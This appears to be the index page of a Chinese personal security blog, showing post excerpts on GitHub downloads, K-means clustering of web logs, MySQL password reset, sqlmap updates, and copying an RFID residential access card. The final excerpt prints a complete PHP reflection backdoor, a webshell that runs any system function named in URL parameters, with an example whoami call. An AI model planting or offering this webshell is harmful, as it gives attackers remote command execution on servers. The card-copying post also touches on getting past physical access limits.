Github下载单个文件或文件夹Tips

最近学习Storm,于是从Github下载https://github.com/alibaba/jstorm 由于环境已经通过其他方式部署完成,所以并不需要完整的项目,只需要下载单个文件或者文件夹,这个时候使用git就比较麻烦了。 另外github听说不支持git clone某个文件或者文件夹,为的是保证project的完整性 ,而使用SVN就没问题了 方法如下:  首先找到项目中需要下载的文件夹,如:https://github.com/alibaba/jstorm/tree/master/example 将tree/...

阅读全文>>

使用K-means对网站访问者进行聚类

在分析Web日志流程中,寻找可疑请求、寻找异常访问者为分析流程中的基础流程,传统的做法是使用正则进行筛选,而这些正则则是通过我们已知的安全经验编写出来的,此时我们可以通过尝试一些新的方法~ 一、数据准备 同上篇 二、算法测试 依赖库地址:[K-Means Java实现](https://sourceforge.net/p/yuanboshekmeans/code/ref/master/) 我们下载kmeans库之后将其引用到项目中,并编写测试Demo,测试库的可用性。测试Demo如图:  可以看到我们使用了4个3维的样本数据,数据...

阅读全文>>

Web安全日志分析浅谈


阅读全文>>

RFID门禁卡折腾过程记录

以前在社区看见各种关于RFID的帖子,但是一直没花时间尝试。 近期物业重新安装了小区大门,以前绕一绕,或者钻一下还是能进去的- -, 然而物业说,门禁卡最多只能办五张,有人说假装掉了重新去办五张.(刚办第一天卡就全掉了?听上去就不合理。) 然后说去外面复制,结果别人收30一张.. 由于这些原因,就开启了我的门禁卡折腾之旅 0x01:数据读取 使用TagInfo和Mifare Classic Tool读取门禁卡(需要手机支持NFC) PS:如果你读取的卡片数据如图一所示只有在第...

阅读全文>>

个人项目&工具导航

最近经常有人问我要脚本、工具啥的..其实你们仔细找找,就能找到。不过为了照顾小白,在此文章建立导航。 0.Web信息收集工具 地址:http://jeary.org/post-4.html 说明:此工具为初学c#所写,所以有些地方有bug,另外功能方面也体验不好(写这个工具的时候还是未成年呀!!) PS:此工具已放弃维护,别再问我有没有新版了.. 1.社交信息爬取工具 地址:http://jeary.org/post-5.html 说明:有一段时间喜欢从别人的公开社交信息收集...

阅读全文>>

Linux下安装PhpMyAdmin

kali下,用命令行查看数据略蛋疼,所以还是安装个phpmyadmin吧.方法比较简单,安装过程还是很顺利的. 1.下载phpmyadmin wget http://nchc.dl.sourceforge.net/project/phpmyadmin/phpMyAdmin/3.3.10/phpMyAdmin-3.3.10-all-languages.tar.gz 2.解压 tar xvfz phpMyAdmin-3.3.10-all-languages.tar.gz 3.改名并移动到apach...

阅读全文>>

Mysql忘记密码

虽然和mysql打交道这么长时间,以前也忘记过密码,不过要在linux下命令操作,还是有些生疏,于是翻了翻资料,记录下来 1.停止mysql service mysql stop 2.设置跳过验证 mysqld_safe --skip-grant-tables 3.再开个终端 root@linux: mysql mysql > use mysql; mysql > updata user set password=password(...

阅读全文>>

Linux & Win 文件内容搜索命令

有时候我们想快速找到某个目录或某个盘符下哪个文件里面存在指定的字符串,可以使用如下命令: win: findstr /s /i /n /d:D:\ "hahaha" *.txt    //寻找D盘下所有包含hahaha的txt文件 linux: find /var/www -name "*.*" | xargs grep "pass"   //从www目录开始查找所有包含pass的文件 记录备用.

阅读全文>>

Sqlmap update error help

发现自己的sqlmap挺老的了,于是用--update参数更新,结果遇到问题 错如如下: for Linux platform it’s required to install a standard ‘git’ package (e.g.: ‘sudo apt-get install git’) 通过搜索,发现解决方案,这里记录: Install git: apt-get install git Go to the sqlmap dir: cd /usr/share/sqlmap Initialize the reposi...

阅读全文>>

Php反射后门

<?php $func = new ReflectionFunction($_GET[m]); echo $func->invokeArgs(array($_GET[c])); ?> 用法:http://localhost/fs.php?m=system&c=whoami (园长博客看见,试验了一下,存个档..)

阅读全文>>